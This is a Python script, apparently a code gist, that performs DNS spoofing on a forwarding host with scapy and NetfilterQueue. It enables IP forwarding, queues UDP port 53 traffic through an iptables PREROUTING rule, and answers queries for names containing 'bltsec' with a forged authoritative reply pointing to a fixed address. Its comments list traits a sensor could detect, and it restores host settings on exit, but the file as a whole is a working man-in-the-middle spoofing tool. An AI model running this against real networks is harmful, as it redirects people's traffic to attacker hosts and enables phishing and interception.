Created
December 9, 2017 23:52
#!/usr/bin/env python3 | |
from scapy.all import * | |
from netfilterqueue import NetfilterQueue | |
import os | |
def modify(packet):
    """NetfilterQueue callback: inspect one queued packet and issue a verdict.

    The raw payload is parsed into a scapy ``IP`` packet object. Every DNS
    question name is printed. When the name contains the watched byte
    string, the payload is replaced by a forged DNS response before the
    packet is accepted; all other packets are accepted unchanged.

    Properties of the forged response, as built below, that a client-side
    check or a network sensor can key on:
      * source and destination address/port are the query's, swapped, so it
        appears to come from the resolver the client asked;
      * the transaction id and question section are copied from the query;
      * the authoritative-answer bit is set (aa=1);
      * a single answer record with TTL 10 and a fixed rdata address.
    Nothing in it is signed, so a DNSSEC-validating client has no valid
    signature to check it against.

    NOTE(review): ``decode('utf-8')`` is strict; a question name that is not
    valid UTF-8 raises here before ``packet.accept()`` is reached, so that
    packet gets no verdict from this callback.
    """
    watched = b'bltsec'
    parsed = IP(packet.get_payload())  # raw payload bytes -> scapy IP packet object

    if parsed.haslayer(DNSQR):
        qname = parsed[DNS].qd.qname
        print(qname.decode('utf-8'))

        if watched in qname:
            print('It does have it***********************')

            # Build the reply layer by layer; the values mirror the query.
            ip_layer = IP(dst=parsed[IP].src, src=parsed[IP].dst)
            udp_layer = UDP(dport=parsed[UDP].sport, sport=parsed[UDP].dport)
            answer = DNSRR(rrname=qname, ttl=10, rdata='192.168.2.29')
            dns_layer = DNS(id=parsed[DNS].id, qr=1, aa=1,
                            qd=parsed[DNS].qd, an=answer)

            # Overwrite the queued packet's content with the forged response.
            packet.set_payload(bytes(ip_layer / udp_layer / dns_layer))
            print('[+] Sent spoofed packet for %s' % watched)

    # Always hand the packet back to the kernel, modified or not.
    packet.accept()
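if __name__ == '__main__':
    # Test-bench setup and teardown around the queue loop.
    #
    # Host state touched here: the IPv4 forwarding sysctl and one rule in
    # the nat/PREROUTING chain. Teardown undoes exactly those two changes.
    # The earlier version flushed every chain in the filter and nat tables
    # and forced ip_forward to 0, which wipes the host's own firewall rules
    # and any forwarding setting that was in place before the run; it also
    # cleaned up only on Ctrl-C, leaving the rule and forwarding enabled
    # after any other failure.
    FORWARD_FLAG = '/proc/sys/net/ipv4/ip_forward'
    # Only UDP packets with destination port 53 that traverse PREROUTING are
    # queued; DNS carried over TCP, TLS or HTTPS never reaches the callback.
    QUEUE_RULE = 'PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1'

    # Remember the current forwarding setting so it can be restored on exit.
    with open(FORWARD_FLAG) as flag:
        previous_forwarding = flag.read().strip()

    rule_added = False
    bound = False
    nfqueue = None
    try:
        with open(FORWARD_FLAG, 'w') as flag:
            flag.write('1')

        # os.system returns the exit status; 0 means the rule was appended.
        rule_added = os.system('iptables -t nat -A ' + QUEUE_RULE) == 0

        nfqueue = NetfilterQueue()
        # 1 is the iptables rule queue number, modify is the callback function
        nfqueue.bind(1, modify)
        bound = True

        print('[*] waiting for data...')
        nfqueue.run()
    except KeyboardInterrupt:
        print('\nExiting...')
    finally:
        # Runs on Ctrl-C and on any other error, so the host is not left
        # forwarding traffic or holding a rule that feeds a dead queue.
        if bound:
            nfqueue.unbind()
        if rule_added:
            # Delete only the rule appended above; other rules are untouched.
            os.system('iptables -t nat -D ' + QUEUE_RULE)
        with open(FORWARD_FLAG, 'w') as flag:
            flag.write(previous_forwarding)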